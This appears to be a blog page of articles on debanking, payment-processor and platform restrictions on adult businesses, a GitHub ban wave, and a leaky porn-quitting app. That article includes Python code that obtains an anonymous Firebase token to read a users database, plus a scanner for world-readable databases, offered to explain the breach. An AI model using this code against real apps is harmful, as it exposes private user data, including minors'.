Business Attacks

Debanking Explained: How Politics, Policy, and Perception Shape Account Closures

The Cato Institute has published a report on debanking. You can find it here: https://www.cato.org/policy-analysis/understanding-debanking-evaluating-governmental-operational-political-religious?utm_source=social&utm_medium=email&utm_campaign=Cato%20Social%20Share

Here’s what the report is all about:

Debanking can be a frustrating and deeply unsettling experience. One day everything seems fine, and the next, a notice arrives giving just 30 days to withdraw funds and find a new financial institution. Confusion quickly turns into anxiety. Bills were paid, nothing appeared out of the ordinary — so what changed? A call to the bank rarely brings clarity, and the response is often the same: no further details can be provided. Customers are left with more questions than answers.

On the other side of the conversation, bankers are frequently constrained by strict confidentiality requirements. Even frontline staff may not have access to the underlying reasons for an account closure. Financial institutions operate within a framework of anti–money laundering, know your customer, and countering the financing of terrorism regulations — commonly referred to as AML, KYC, and CFT. While these rules are standard practice within the industry, they remain largely invisible to the public, creating a disconnect that fuels frustration on both sides.

For those looking to address the growing concern around debanking, some argue that meaningful change will require greater transparency. That could mean reconsidering the confidentiality that surrounds account closures, removing reputational risk as a regulatory factor, and reevaluating the Bank Secrecy Act framework that effectively places financial institutions in the role of investigative gatekeepers.

Read More »

When Women’s Wellness Gets Labeled “Adult,” the Bank Account Disappears

It starts with a quiet email. No warning. No phone call. Just a notice that your account is under review—or worse, closed.

That’s what’s happening to women’s health and sexual wellness companies across the United Kingdom and Europe. Not because they’ve broken laws. Not because they’ve done anything shady. But because somewhere in a compliance department, someone ticked the wrong box and labeled them “adult content.”

New research from two U.K.-based advocacy groups, CensHERship and The Case For Her, digs into what’s really going on. And it’s uncomfortable reading. The report argues that women’s health innovators are being misclassified in financial systems, triggering debanking and account shutdowns that can stall or even sink young companies.

“What we find is that misclassification, over-compliance, cultural discomfort, and outdated policy language combine to create structural barriers for women’s health innovation, and that the identified structural barriers tend to fall into two forms,” the research explains.

Those two forms? “Misclassification” and “misunderstanding.”

Misclassification is described as “where women’s health and sexual wellbeing are misread as adult content. This is the most visible and well-documented form of bias.”

Misunderstanding, on the other hand, is “where women’s health is overlooked as too new, complex, or unfamiliar to fit existing risk templates. These cases are harder to surface because they are often resolved quietly or never formally recorded.”

That second one hits differently. It’s the kind of bias that doesn’t shout. It just shrugs. Too new. Too complex. Too awkward. Next.

Some of the companies affected are household names in the space, including SheSpot, a widely recognized brand. These aren’t fringe operators. They’re mainstream wellness businesses trying to build products around bodies that, frankly, have been underserved for generations.

The report goes further: “Because most financial institutions have never explicitly defined women’s health or FemTech within their risk frameworks, systems default to the nearest analogue—typically adult content, vice categories, or other ‘sensitive’ sectors.”

That line sticks. Systems default. That’s how it happens. No villain twirling a mustache. Just outdated templates and risk models built in eras when women’s sexual health was barely discussed in polite company. So instead of creating a new category, institutions drag these companies into old ones—adult content, vice, high-risk.

It’s lazy. It’s structural. And it’s expensive.

Both CensHERship and The Case For Her argue that outdated classification systems, cultural discomfort, and unconscious bias are creating real barriers to growth. Being labeled “adult content” or “adult services” doesn’t just sound insulting—it places these businesses in a “high-risk sector” alongside firearms manufacturing and tobacco cultivation and marketing.

Think about that for a second. A company developing pelvic health tools or hormone-tracking tech ends up sitting in the same risk bucket as cigarette production.

This isn’t just semantics. Risk labels determine whether you can open a bank account, process payments, attract investors, or scale internationally. When the system quietly decides your innovation is morally adjacent to vice, you feel it everywhere.

Honestly, it raises a bigger question: if financial institutions can’t tell the difference between sexual wellness and adult entertainment, what does that say about the frameworks we’re still operating under?

Maybe the real issue isn’t that women’s health is “too new.” Maybe it’s that the systems judging it are too old.

Read More »

Adult Creators Keep Getting Debanked — And the Fallout Goes Far Beyond Them

Your bank may never send you a memo about it, but it’s quietly shaping your life.

Every time you click “buy now,” a small army of institutions decides whether that purchase gets to exist. And for adult creators, that army has been steadily tightening its grip. For years, people in the industry have been warning about financial discrimination and debanking — the sudden closure of accounts, the polite but devastating “we can no longer do business with you.” It’s happening more often now. And it’s happening quietly.

“I don’t know what could happen next or when it might happen,” says adult VTuber, journalist, and activist Ana Valens. In just two weeks last November, nearly every platform she relied on either removed her content or suspended her outright. “While my Patreon and Ko-fi were reinstated, I’ve spent the past two months waiting for the other shoe to drop — another Patreon ban, my PayPal deactivated, and so on.” She reached out for explanations. Most platforms couldn’t clearly articulate how she’d violated their terms. Ko-fi didn’t respond until repeated messages finally led to reinstatement.

That kind of uncertainty lingers. It’s like walking on ice that might crack at any moment.

“Deplatforming and debanking are an occupational hazard for any adult content creator,” says Gina, a co-founder of PeepMe, a startup that set out to build a worker-owned creator marketplace. PeepMe was imagined as an alternative to OnlyFans and Patreon — a space where creators could hold equity, elect a democratic board, and receive quarterly profit-sharing dividends.

Gina requested that a pseudonym be used, given her continued work adjacent to the adult industry and the very real fear of financial fallout. “Even still, I’ve never seen someone banned on so many sites before [as Ana has been],” she says.

And it’s not just adult creators feeling the pressure. Companies in oil and gas, cryptocurrency, tobacco, and firearms have also raised concerns about politically motivated debanking. The pushback has grown loud enough that U.S. regulators are now stepping in, attempting to rein in financial discrimination.

Who’s Blocking My Buying?

When you make an online purchase, your money doesn’t travel in a straight line. It passes through layers of gatekeepers. The pipeline often looks like this:

  1. Platform (merchant) websites: where creators earn income — YouTube, Patreon, Etsy, DoorDash, Steam.

  2. Payment processors: companies that route the transaction between card networks and banks — PayPal, Stripe.

  3. Card networks: Visa, American Express, Mastercard — the rule-makers that standardize how buyers and sellers interact.

  4. Your bank and the seller’s bank: Wells Fargo, Bank of America, and so on.

Each step has discretion. Beyond preventing illegal activity, these institutions can decide what kinds of money they’re willing to touch.
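To make that "each step has discretion" point concrete, here is a minimal, purely illustrative sketch of the pipeline as a chain of independent gatekeepers. The class, function, and category names are hypothetical and do not correspond to any real payment API; the point is simply that a transaction survives only if every layer, applying its own policy, lets it through.

```python
# Purely illustrative model of the payment pipeline described above.
# Names and policies are hypothetical, not any real platform's API.
from dataclasses import dataclass

@dataclass
class Transaction:
    merchant_category: str   # e.g. "adult_content", "books"
    amount_usd: float

def platform_policy(tx: Transaction) -> bool:
    # Platforms enforce their own content terms.
    return tx.merchant_category != "unlawful"

def processor_policy(tx: Transaction) -> bool:
    # Processors often refuse whole categories outright.
    return tx.merchant_category not in {"unlawful", "adult_content"}

def card_network_policy(tx: Transaction) -> bool:
    # Card networks reserve broad "brand damage" discretion.
    return tx.merchant_category not in {"unlawful", "adult_content", "high_risk"}

def bank_policy(tx: Transaction) -> bool:
    # Banks layer their own risk appetite on top of everything else.
    return tx.merchant_category != "unlawful" and tx.amount_usd < 10_000

GATEKEEPERS = [platform_policy, processor_policy, card_network_policy, bank_policy]

def transaction_clears(tx: Transaction) -> bool:
    # A single refusal anywhere in the chain kills the payment.
    return all(gate(tx) for gate in GATEKEEPERS)

print(transaction_clears(Transaction("books", 20.0)))          # True
print(transaction_clears(Transaction("adult_content", 20.0)))  # False: blocked mid-chain
```

The structural takeaway of the sketch is that the most restrictive policy anywhere in the chain becomes the effective policy for everyone downstream of it.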

“The rules set by card networks are sometimes vague,” says Dr. Val Webber, a postdoctoral researcher at Dalhousie University’s Sexual Health and Gender Research Lab. Mastercard’s June 2025 rules restrict “any Transaction that […] in the sole discretion of [Mastercard], may damage the goodwill of [Mastercard] or reflect negatively on the [brand].”

“In the sole discretion” is doing a lot of work there.

Last summer, Steam and itch.io removed or deindexed adult games after pressure from payment processors and card networks. Steam cited pressure from Mastercard, conveyed through processors like Stripe. Stripe told itch.io, “Stripe is currently unable to support sexually explicit content due to restrictions placed on them by their banking partners, despite card networks generally supporting adult content.” Stripe’s prohibited business list includes “pornography and other mature audience content (including literature, imagery, and other media) designed for the purpose of sexual gratification.”

Mastercard later denied involvement. In August 2025, the company stated, “Mastercard has not evaluated any game or required restrictions of any activity on game creator sites and platforms, contrary to media reports and allegations.”

Meanwhile, Valens saw her articles disappear from Vice. “My suspicion is that it was easy for a financial company to flag me as high risk as a punitive measure for my content, or my activism work,” she says. Attempts to obtain comment from Vice were unsuccessful.

Who Can Get Debanked?

“We have lots of data to show that people in the adult industry face financial discrimination in the form of their accounts being closed, being denied mortgages, business loans, and other banking services — despite banks often not being able to substantiate legal reasons related to these individual accounts,” says Maggie MacDonald, a PhD researcher at the University of Toronto.

The tension escalated in December 2020 when Visa and Mastercard cut ties with Pornhub, citing child sexual abuse material (CSAM). “Our adult content standards allow for legal adult activity created by consenting individuals or studios,” Mastercard said at the time. “Merchants must have controls to monitor, block and remove unlawful content from being posted.” Pornhub denied hosting illegal content and emphasized the harm to “the hundreds of thousands of models who rely on [their] platform for their livelihoods.”

But here’s the inconsistency that nags at people: X continues to process payments despite widespread reports of CSAM and non-consensual deepfake content. No sweeping financial freeze there.

Watching major platforms lose payment relationships makes smaller startups tread lightly. “We just can’t afford to lose our ability to do business with these financial companies,” Gina says. “Stripe takes only 2.9 percent from businesses they’re willing to work with, while high-risk processors willing to take on adult content can charge up to 15 percent.”

That difference can sink a company before it starts.
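To put that fee gap in rough numbers, here is a small hypothetical illustration. The monthly volume figure is invented for the example; the two rates are simply the ones quoted above.

```python
# Hypothetical illustration of the processing-fee gap described above.
monthly_sales = 50_000          # invented creator-marketplace volume, in USD
standard_rate = 0.029           # the 2.9 percent figure quoted for Stripe
high_risk_rate = 0.15           # the "up to 15 percent" figure for high-risk processors

standard_fees = monthly_sales * standard_rate    # $1,450
high_risk_fees = monthly_sales * high_risk_rate  # $7,500

print(f"Standard processing:  ${standard_fees:,.0f}/month")
print(f"High-risk processing: ${high_risk_fees:,.0f}/month")
print(f"Cost of the high-risk label: ${high_risk_fees - standard_fees:,.0f}/month")
```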

“Losing a relationship with card networks is a risk payment processors can’t afford, and losing relationships with payment processors is a risk that platform websites can’t afford,” explains Webber. “In the end, the responsibility of ensuring their content stays within the lines of these oftentimes unclear rules trickles down to each individual creator. Because ultimately, content creators are more expendable to platforms than payment processors and card networks.”

One justification often cited is chargebacks — when customers reverse credit card transactions. Gina isn’t convinced.

“Locking out entire industries makes less and less sense as fraud detection technology advances,” she says. “Payment processors and card networks already have processes to step in when an individual business has a high rate of chargebacks, there’s no reason to block out a whole industry.” Mastercard recently announced expanded generative AI fraud-detection tools, building on already sophisticated monitoring systems.

“We also haven’t seen the claim of high-chargebacks in adult content substantiated anywhere in terms of measured data,” adds MacDonald. “As a researcher, that makes me suspicious of the criteria these companies are using behind the scenes.”

The Evolving Landscape of Banking Regulations

In February 2025, the Free Speech Coalition filed a statement with the U.S. House Committee on Financial Services, calling for due process protections, objective risk assessments, and explicit recognition that lawful adult businesses do not inherently present financial crime risk. Blocking entire industries without individualized evaluation, the statement argued, is regulatory overreach with serious implications for free speech.

Multiple efforts are underway in the United States to limit financial institutions from denying service for reasons beyond legal violations. In August 2025, President Donald Trump issued an executive order directing regulators to investigate and reverse politically motivated debanking. Bank regulators have begun removing “reputational risk” from compliance criteria, and proposed Senate legislation would impose civil fines on banks and card networks that avoid entire categories of customers.

“Card networks and payment processors began by blocking pornography, but they’ve moved into other online industries as well,” says Webber. “The line in the sand continues to shift, and it has recently expanded to video game creators and streamers as well. We don’t know how these rules might evolve, and what type of online content might be next.”

Valens has spent months urging customers to call Mastercard, Visa, PayPal, and Stripe to question purchase restrictions and account freezes. Visa points to its policies for combating illegal activity; PayPal requires pre-approval for adult materials, similar to tobacco; Stripe states it does not support adult content.

“Private companies have been deputized to decide how we can earn and spend our money,” says MacDonald. “Anyone who is ideologically misaligned with any of these companies faces the risk of losing their livelihood.”

That’s the part that lingers.

It’s not just about porn, or games, or activism. It’s about the invisible committee that votes on your transactions — and whether one day, without warning, they decide you don’t get a vote at all.

Read More »

Discord Plans Mandatory Age Verification for All Users in 2026

Something quietly fundamental is about to change on one of the internet’s most familiar hangouts. Discord’s senior leadership confirmed this week that age verification will become mandatory for all users starting in March 2026, alongside a shift to what the company calls “teen-by-default” settings across the entire platform.

The expanded safety rollout, according to the company, is meant to create “a safer and more inclusive experience for users over the age of 13.” On paper, it sounds tidy. In practice, it signals a pretty big cultural shift for a platform that’s long felt like the digital equivalent of a messy, unlocked group chat.

“As part of this update, all new and existing users worldwide will have a teen-appropriate experience by default, with updated communication settings, restricted access to age-gated spaces, and content filtering that preserves the privacy and meaningful connections that define Discord,” the company said. It’s a careful balance they’re trying to strike — safety without sanding off the personality that made people show up in the first place.

“Nowhere is our safety work more important than when it comes to teen users, which is why we are announcing these updates in time for Safer Internet Day,” said Savannah Badalich, Discord’s head of product policy, referencing the February 10 awareness initiative. “Rolling out teen-by-default settings globally builds on Discord’s existing safety architecture, giving teens strong protections while allowing verified adults flexibility.”

Badalich added, “We design our products with teen safety principles at the core and will continue working with safety experts, policymakers, and Discord users to support meaningful, long-term wellbeing for teens on the platform.” It’s the kind of statement you’d expect — earnest, forward-looking, and clearly written with regulators peeking over shoulders.

Under the new “teen-by-default” framework, users will have to go through age-verification steps to access channels and servers labeled as “age-restricted.” That includes spaces run by adult content creators, online sex workers, sexually themed communities, sexual animation hubs, and certain fan communities that live closer to the edges of the platform.

There’s also an unspoken tension here that’s hard to ignore. Discord has been down this road before, and not without bruises.

The platform previously experienced a data breach involving one of its age-verification vendors, exposing sensitive verification materials, including government-issued identification. For users who already feel uneasy about handing over personal documents online, that memory hasn’t exactly faded.

That incident stemmed from mistakes by a customer experience vendor, 5CA, which outsources work to customer service agents in countries including the Philippines. Discord’s primary age-verification partner, K-ID, later stated that it had no involvement in the breach tied to its standard verification systems.

So here we are again — a platform promising better protection, safer defaults, and stronger guardrails, while carrying the weight of past missteps. Maybe this time the systems hold. Maybe trust rebuilds. Or maybe the internet does what it always does and asks the same old question, just in a new tone: how much safety is worth how much control?

Read More »

App Meant to Help Users Quit Porn Leaked Their Masturbation Habits

There’s something quietly disturbing about discovering that a tool meant to help people wrestle with their most private habits accidentally left the blinds wide open. An app that claims to help users stop consuming pornography ended up exposing intensely sensitive personal data — the kind of stuff most people wouldn’t even admit to a close friend. Ages. Masturbation frequency. Emotional triggers. How porn makes them feel afterward. And tucked inside that data were a lot of minors, which makes your stomach drop a little when you really sit with it.

One user profile, for instance, listed their age as “14.” Their “frequency” showed porn use “several times a week,” sometimes up to three times a day. Their “triggers” were logged as “boredom” and “Sexual Urges.” The app had even assigned a “dependence score” and listed their “symptoms” as “Feeling unmotivated, lack of ambition to pursue goals, difficulty concentrating, poor memory or ‘brain fog.’” It reads less like analytics and more like a vulnerable diary entry — something that was supposed to stay locked away.

The app isn’t being named because the developer still hasn’t fixed the issue. The problem was uncovered by an independent security researcher who asked to remain anonymous. He first flagged it to the app’s creator back in September. The creator said he’d fix it quickly. That didn’t happen. The flaw comes from a misconfiguration in how the app uses Google Firebase, a popular mobile app development platform. By default, Firebase can make it surprisingly easy for anyone to become an “authenticated” user and access backend storage — the digital attic where all the private boxes tend to live if you’re not careful.
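For readers wondering what that misconfiguration looks like in practice, here is a minimal sketch of the classic check, assuming a hypothetical project whose Realtime Database rules grant read access to any authenticated user and which has anonymous sign-in enabled. The project URL and API key below are placeholders, not the app in question; the Firebase Auth and Realtime Database REST endpoints themselves are standard.

```python
# Minimal sketch of the "anyone can become an authenticated user" problem.
# PROJECT_API_KEY and DB_URL are placeholders for a hypothetical project,
# not the app discussed in the article.
import requests

PROJECT_API_KEY = "AIza...placeholder"
DB_URL = "https://example-project-default-rtdb.firebaseio.com"

# Step 1: anonymous sign-up via the Firebase Auth REST API. If anonymous
# auth is enabled, this returns a valid ID token to anyone who asks for one.
resp = requests.post(
    f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={PROJECT_API_KEY}",
    json={"returnSecureToken": True},
    timeout=10,
)
id_token = resp.json().get("idToken")

# Step 2: read backend storage. With rules like `".read": "auth != null"`,
# that throwaway token is enough to dump entire collections.
data = requests.get(f"{DB_URL}/users.json", params={"auth": id_token}, timeout=10)
print(data.status_code, str(data.json())[:200])
```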

Overall, the researcher said he could access information belonging to more than 600,000 users of the porn-quitting app, with roughly 100,000 identifying as minors. That number lands heavy. It’s not abstract. It’s classrooms. It’s school buses. It’s kids who probably assumed they were talking into a void, not a wide-open window.

The app also invites users to write confessions about their habits. One of them read: “I just can’t do this man I honestly don’t know what to do know more, such a loser, I need serious help.” You can almost hear the frustration in that sentence — the messy spelling, the emotional spill. That’s not data. That’s a human having a rough night.

When reached by phone, the creator of the app said he had spoken with the researcher but claimed the app never exposed any user data due to a misconfigured Google Firebase. He suggested the researcher may have fabricated the data that was reviewed.

“There is no sensitive information exposed, that’s just not true,” the founder said. “These users are not in my database, so, like, I just don’t give this guy attention. I just think it’s a bit of a joke.”

When asked why he previously thanked the researcher for responsibly disclosing the misconfiguration and said he would rush to fix it, he wished me a good day and hung up. One of those conversations that ends abruptly, leaving a strange quiet buzzing in the room.

After the call, an account was created on the app. The researcher was then able to see that new account appear inside the misconfigured Google Firebase environment — confirmation that user information was still exposed and accessible. Sometimes reality has a way of answering arguments faster than any debate ever could.

This type of Google Firebase misconfiguration isn’t new. Security researchers have been talking about it for years, and it continues to surface today. It’s one of those problems that feels boring until it suddenly isn’t — until someone’s real life data is sitting out in the open.

Dan Guido, CEO of cybersecurity research and consulting firm Trail of Bits, said in an email that this Firebase issue is “a well known weakness” and easy to find. He recently noted on X that Trail of Bits was able to build a tool using Claude to scan for this vulnerability in just 30 minutes.
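A scanner for the fully open variant of this problem does not need to be sophisticated. As a rough sketch of the idea only (not a reconstruction of the Trail of Bits tool, and with placeholder database URLs), checking whether a Realtime Database is world-readable is a single unauthenticated request per project:

```python
# Rough sketch of checking Firebase Realtime Databases for world-readable rules.
# The URLs are placeholders; a real survey would derive them from app packages.
import requests

CANDIDATE_DBS = [
    "https://example-one-default-rtdb.firebaseio.com",
    "https://example-two-default-rtdb.firebaseio.com",
]

for db in CANDIDATE_DBS:
    try:
        # Shallow, unauthenticated read of the database root. An open database
        # answers 200 with data; locked-down rules answer 401 "Permission denied".
        r = requests.get(f"{db}/.json", params={"shallow": "true"}, timeout=5)
        status = "OPEN" if r.status_code == 200 else "locked"
    except requests.RequestException:
        status = "unreachable"
    print(f"{db}: {status}")
```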

“If anyone is best positioned to implement guardrails at scale, it is Google/Firebase themselves. They can detect ‘open rules’ in a user’s account and warn loudly, block production configs, or require explicit acknowledgement,” he said. “Amazon has done this successfully for S3.” S3 is a cloud storage product from AWS that previously struggled with similar data exposure issues due to misconfigurations.

The researcher who uncovered the app’s vulnerability added that this insecure setup is often the default in Google Firebase. He also pointed a finger at Apple, arguing that apps should be reviewed for backend security issues before being allowed into the App Store.

“Apple will literally decline an app from the App Store if a button is two pixels too wide against their design guidelines, but they don’t, and they don’t check anything to do with the back end database security you can find online,” he said. It’s one of those comments that lands with an uncomfortable kind of truth — polished surfaces, shaky foundations.

Apple and Google did not respond to requests for comment.

And that’s the part that lingers. People trusted this app with their most awkward truths, their late-night regrets, their quiet attempts at self-control. Some of them were kids. They weren’t posting for an audience. They were whispering into what they thought was a locked room. Turns out the door was never really closed.

Read More »

GitHub Purges Adult Game Developers, Offers No Explanation

Something strange started rippling through a small, niche corner of the internet not long ago. Developers who build mods and plugins for hentai games and even interactive sex toys began waking up to missing repositories, locked accounts, and dead links. GitHub, the place many of them had treated like home base, had quietly pulled the rug out. No warning. No explanation. Just… gone.

From conversations within the community, the rough headcount quickly took shape: somewhere between 80 and 90 repositories, representing the work of roughly 40 to 50 people, vanished in a short window. Many of the takedowns seemed to cluster around late November and early December. A large number of the affected accounts belonged to modders working on games from Illusion, a now-defunct Japanese studio known for titles that mixed gameplay with varying degrees of erotic content. One banned account alone reportedly hosted contributions from more than 30 people across 40-plus repositories, according to members of the modding scene.

What made the situation feel especially surreal was the silence. Most suspended developers say they were never told which rule they’d broken—if any. Their accounts simply stopped working. Several insisted they’d been careful to stay within GitHub’s acceptable use guidelines, avoiding anything overtly explicit. The code was functional, technical, sometimes cheeky in naming, but never pornographic. At least, not in the way most people would define it.

“Amongst my repositories there were no explicitly sexual names or images anywhere in the code or the readme, the most suggestive naming would be on the level of referencing the dick as ‘the men thing’ or referencing the sex as ‘huffing puffing,’” one developer, Danil Zverev, told me. He makes plugins for an Illusion game called Koikatsu. Zverev said he’s been using GitHub for this purpose since 2024, but on November 18, his GitHub page was “completely deleted.” “No notifications anywhere, simply a 404 error when accessing the page and inability to log in on the web or in the mobile app. Also it does not allow me to register a new account with the same name or email.”

The timing raised eyebrows. GitHub had updated its acceptable use policies in October 2025, adding language that forbids “sexually themed or suggestive content that serves little or no purpose other than to solicit an erotic or shocking response, particularly where that content is amplified by its placement in profiles or other social contexts.” The policy explicitly bars pornographic material and “graphic depictions of sexual acts including photographs, video, animation, drawings, computer-generated images, or text-based content.”

At the same time, the policy leaves room for interpretation. “We recognize that not all nudity or content related to sexuality is obscene. We may allow visual and/or textual depictions in artistic, educational, historical or journalistic contexts, or as it relates to victim advocacy,” GitHub’s terms of use state. “In some cases a disclaimer can help communicate the context of the project. However, please understand that we may choose to limit the content by giving users the option to opt in before viewing.”

Zverev didn’t bother appealing. He said writing to support felt pointless and chose instead to move on to another platform. Others tried to fight it—and found themselves stuck in limbo.

A developer who goes by VerDevin, known for Blender modding guides, utility tools, and plugins for the game Custom Order Maid 3D2, said users began reporting trouble accessing his repositories in late October. Oddly, he could still see his account when logged in, but not when browsing while logged out.

“Turned out, as you already know, that my account was ‘signaled’ and I had to purposefully go to the report section of Github to learn about it. I never received any notifications, by mail or otherwise,” VerDevin told me. “At that point I sent a ticket asking politely for clarifications and the proceedings for reinstatement.”

The response from GitHub Trust & Safety was vague and procedural: “If you agree to abide by our Terms of Service going forward, please reply to this email and provide us more information on how you hope to use GitHub in the future. At that time we will continue our review of your request for reinstatement.”

VerDevin replied the next day, agreeing to comply and offering to remove whatever GitHub considered inappropriate—despite still not knowing what that was. “I did not take actual steps toward it as at that point I still didn’t know what was reproach of me,” they said.

A full month passed before GitHub followed up. “Your account was actioned due to violation of the following prohibition found in our Acceptable Use Policies: Specifically, the content or activity that was reported included multiple sexually explicit content in repositories, which we found to be in violation of our Acceptable Use Policies,” GitHub wrote.

“At that point I took down several repositories that might qualify as an attempt to show good faith (like a plugin named COM3D2.Interlewd),” they said. GitHub restored the account on December 17—weeks later, and just one day after additional questions were raised about the ban—but never clarified which content had triggered the action in the first place.

Requests for explanation went unanswered. Even when specific banned accounts were flagged to GitHub’s press team, the response was inconsistent. Some accounts were reinstated. Others weren’t. No clear reasoning was ever shared.

The whole episode highlights a problem that feels painfully familiar to anyone who’s worked on the edges of platform rules: adult content policies that are vague, inconsistently enforced, and devastating when applied without warning. These repositories weren’t fringe curiosities—they were tools used by potentially hundreds of thousands of people. The English-speaking Koikatsu modding Discord alone has more than 350,000 members. Another developer, Sauceke, whose account was suspended without explanation in mid-November, said users of his open-source adult toy mods are now running into broken links or missing files.

“Perhaps most frustratingly, all of the tickets, pull requests, past release builds and changelogs are gone, because those things are not part of Git (the version control system),” Sauceke told me. “So even if someone had the foresight to make mirrors before the ban (as I did), those mirrors would only keep up with the code changes, not these ‘extra’ things that are pretty much vital to our work.”

GitHub eventually reinstated Sauceke’s account on a Tuesday—seven weeks after the original suspension—following renewed questions about the bans. Support sent a brief note: “Thank you for the information you have provided. Sorry for the time taken to get back to you. We really do appreciate your patience. Sometimes our abuse detecting systems highlight accounts that need to be manually reviewed. We’ve cleared the restrictions from your account, so you have full access to GitHub again.”

Even so, the damage lingers. In Sauceke’s account and others, including the IllusionMods repository, release files remain hidden. “This makes the releases both inaccessible to users and impossible to migrate to other sites without some tedious work,” Sauceke said.

Accounts may come back. Repositories might be restored. But for many developers, the trust is already gone—and that’s the kind of thing that doesn’t reinstall quite so easily.

GitHub isn’t just another code host—it’s the town square for open-source developers. For adult creators especially, who are used to being quietly shoved to the margins everywhere else, visibility there actually matters. It’s how people find each other, trade ideas, and build something that feels bigger than a solo side project. “It’s the best place to build a community, to find like-minded people who dig your stuff and want to collaborate,” Sauceke said. But if this wave of bans stretches beyond hentai game and toy modders, they warned, it could trigger a slow exodus. Some developers aren’t waiting around to find out, already packing up their repositories and moving them to GitGoon, a platform built specifically for adult developers, or Codeberg, a nonprofit, Berlin-based alternative that runs on a similar model.

Read More »

Nevada’s Legal Sex Workers Claim They’re Being Muted on X

It didn’t happen slowly. It wasn’t subtle. Within the past month, legal Nevada sex workers have been hit with a sudden, sweeping wave of account suspensions on X, the platform once known as Twitter. Not for doing anything illegal. Not for soliciting crimes. These are licensed workers, operating in the only state where brothel-based sex work is legal — and yet their voices are vanishing from a platform that once wrapped itself in the language of free speech.

That promise came straight from Elon Musk himself when he set his sights on buying Twitter. At the time, he framed the platform as something almost sacred, saying:

“Free speech is the bedrock of a functioning democracy, and Twitter is the digital town square.”

He followed that with another line meant to reassure skeptics:

“By ‘free speech’ I simply mean that which matches the law.”

By that definition, Nevada sex work clearly qualifies.

Prostitution is legal in Nevada when it takes place inside licensed brothels, as outlined in Nevada Revised Statutes 201.354. Counties are empowered to license and regulate these brothels under Nevada Revised Statutes 244.345, while workers comply with additional health and safety standards set by the state. At present, six counties operate legal brothels. This isn’t a loophole or a gray area — it’s a fully regulated, lawful industry.

At first glance, it might look like X is simply enforcing broad rules around adult content. But the reality cuts deeper. When legal Nevada sex workers lose their accounts, they’re erased from public conversation — conversation that increasingly lives and breathes on platforms like X. What’s left behind is a so-called “digital town square” where only certain voices are allowed to stay standing.

Nevada sex workers understand exactly what’s at stake when they’re shut out. Not long ago, anti-brothel groups attempted to dismantle the legal system through ballot initiatives. When voters heard directly from sex workers, those efforts failed — decisively. In the 2018 Lyon County referendum, for example, nearly 80 percent of voters rejected a proposed brothel ban.

That wasn’t an accident. When sex workers are able to speak publicly, explain how the licensed system actually functions, and share their lived experiences, people listen. Voters learn about the safeguards, the structure, and why legal brothels exist in the first place — not from headlines or fear campaigns, but from the people inside the system.

Silencing those voices on X means the public hears less from those with firsthand knowledge. Anti-sex-work narratives remain visible, amplified, and largely unchallenged. The workers most affected by stigma and policy decisions fade into the background.

This isn’t just about clumsy algorithms sweeping up adult content. It’s about who gets to participate in conversations that can shape laws, livelihoods, and lives. Platforms don’t just host debate — they quietly curate it by deciding who stays and who disappears.

When licensed Nevada sex workers are removed from social media, the public square stops reflecting reality. The debate tilts. The story becomes one-sided. And the people whose livelihoods are on the line — most of them women — lose the chance to speak for themselves.

Maybe that’s the most unsettling part. If this can happen to a group operating legally, transparently, and within the law, it raises an uncomfortable question: who’s next when an algorithm decides a voice is inconvenient?

Read More »

U.S. OCC Releases Preliminary Report on Debanking

Some mornings, the news hits you like a jolt of cold water — shocking at first, then oddly clarifying. That’s how it felt when the U.S. Office of the Comptroller of the Currency (OCC) dropped a preliminary report on debanking, finally calling out what so many in the adult industry have been living with for years. It’s strange to feel victorious over a problem you never should’ve had in the first place, but here we are, holding something that looks a lot like validation.

The OCC names nine major banks — the kind everyone’s parents told them were “safe,” including Chase, Wells Fargo, and Bank of America — for potentially violating the President’s Executive Order prohibiting discrimination against people engaged in “lawful business activities.” Reading it, I had one of those moments where you want to underline every other sentence because someone, somewhere in government, actually said the quiet part out loud. The OCC states that the adult industry, among others, was subjected to “inappropriate distinctions” when trying to access basic financial services:

“The OCC’s preliminary findings show that, between 2020 and 2023, these nine banks made inappropriate distinctions among customers in the provision of financial services on the basis of their lawful business activities by maintaining policies restricting access to banking services… For example, the OCC identified instances where at least one bank imposed restrictions on certain industry sectors because they engaged in ‘activities that, while not illegal, are contrary to [the bank’s] values.’ Sectors subjected to restricted access included oil and gas exploration, coal mining, firearms, private prisons, tobacco and e-cigarette manufacturers, adult entertainment, and digital assets.”

Seeing adult entertainment listed there — not as a punchline, not as an afterthought, but as a recognized target of discrimination — is surreal. It’s proof that the federal government isn’t just aware of the problem; it’s saying, pretty plainly, that the problem matters. That we matter. And for once, the burden shifts off the people running these businesses and onto the banks that have quietly punished them under the guise of “values.”

This marks the first time in a long time that the adult industry isn’t shouting into the void. The OCC has confirmed that we’re covered under the Executive Order. Banks now know that the old playbook — the one where they shut down accounts for “reputational risk” and shrug — might actually put them on the wrong side of federal policy.

There’s still a road ahead, of course. In the coming weeks and months, the OCC will move into the rule-making phase, and that’s where the shape of all this becomes real. We’ll learn more as they flesh out the details, and so will everyone who’s been denied a basic checking account simply for doing legal work that made some executive squeamish. But for the first time in years, there’s a crack of daylight. Maybe — just maybe — we’re watching the beginning of the end of a discrimination problem that never should’ve existed in the first place.

And honestly? It’s about time the people holding the money had to explain themselves.

Read More »

Denver Says Strippers Are Workers — and Must Be Treated That Way

Sometimes a ruling hits the news and you can almost feel the collective exhale from people who’ve been waiting far too long to be treated like… well, workers. That’s what happened in Denver, where a district judge decided that strip club entertainers — dancers, performers, the people who carry the whole night on their shoulders — are employees. Real employees. Which means they’re covered by the city’s labor protections and the standard minimum hourly wage that everyone else in the consolidated city and county is supposed to receive.

The decision backs up what a Denver Auditor’s Office hearing officer had already determined while digging into wage theft claims at several strip clubs around town — including big names like the local Rick’s Cabaret branch, PT’s Showclub, PT’s Showclub Centerfold and the Diamond Cabaret. You know the places: neon lights, velvet corners, the kind of spots that thrive on performance yet somehow never wanted to acknowledge the performers as actual staff.

Attorneys for the clubs kept insisting that entertainers were exempt from Denver’s employment-law umbrella, as if the entire job existed in some hazy loophole. But the ruling cut through that fog. It confirmed what the Auditor’s Office has been saying for years: strippers and erotic performers deserve the same wage protections as anyone else clocking in across the city.

“Our office enforces wage theft laws for all industries and protects anyone performing work in Denver. Adult entertainment workers are no different, and we are pleased the courts agree,” said Timothy M. O’Brien, the elected city auditor who oversees Denver Labor. And honestly, hearing that felt like a long-overdue moment of someone naming the obvious.

Denver Labor, by the way, does its job through wage-law enforcement, education, and certified audits — the kind of behind-the-scenes work most people don’t think about until it hits the headlines or their paycheck.

“Entertainers are workers and, therefore, are entitled to the fundamental protections of Denver’s wage ordinances,” reads an informational page from O’Brien’s office.

Read More »

